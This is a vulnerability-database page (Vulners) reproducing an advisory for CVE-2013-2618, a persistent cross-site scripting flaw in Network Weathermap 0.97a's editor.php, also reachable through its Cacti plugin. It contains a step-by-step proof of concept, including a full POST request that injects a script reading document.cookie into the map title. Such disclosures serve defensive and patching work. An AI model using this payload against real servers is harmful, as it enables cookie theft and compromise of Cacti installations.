Vulners
Lucene search
Network Weathermap 0.97a (editor.php) - Persistent XSS
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2013-2618 | 5 Jun 201400:00 | – | attackerkb |
 | CVE-2013-2618 | 12 May 201609:12 | – | circl |
 | Network Weathermap Persistent Cross-Site Scripting (CVE-2013-2618) | 15 Aug 201800:00 | – | checkpoint_advisories |
 | CVE-2013-2618 | 5 Jun 201420:00 | – | cve |
 | CVE-2013-2618 | 5 Jun 201420:00 | – | cvelist |
 | Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting | 2 Apr 201300:00 | – | exploitdb |
 | Network Weathermap 0.97a - editor.php Persistent Cross-Site Scripting | 2 Apr 201300:00 | – | exploitpack |
 | K44164245: XSS vulnerability CVE-2013-2618 | 21 Feb 202318:31 | – | f5 |
 | CVE-2013-2618 | 5 Jun 201420:55 | – | nvd |
 | Network Weathermap 0.97a Cross Site Scripting | 1 Apr 201300:00 | – | packetstorm |
10
INTRODUCTION
Network Weathermap is a network visualisation tool, to take data you
already have and show you an overview of your network in map form.
Support is built in for RRD, MRTG (RRD and old log-format), and
tab-delimited text files. Other sources are via plugins or external scripts.
VULNERABILITY DESCRIPTION
The vulnerability happens when a user injects HTML and Javascript into the
title of a map in editor.php. This title is later shown to the user when
listing the files in editor.php?action=newfile
Besides the title, other fields also allow an attacker to upload malicious
PHP code to a webserver, which can later be executed if the attacker has
direct acess to that file.
This application is often used as a plugin for Cacti. The vulnerability can
be exploited in this mode as well, in
weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and
it can be used to exploit Cacti.
To test it, simply create a map or edit an existing one:
GET editor.php?mapname=test&action=newmap
Then edit the map title with the payload:
POST editor.php
plug=0&mapname=test&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO
Then display the titles:
GET editor.php
# 0day.today [2018-03-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
EPSS0.08691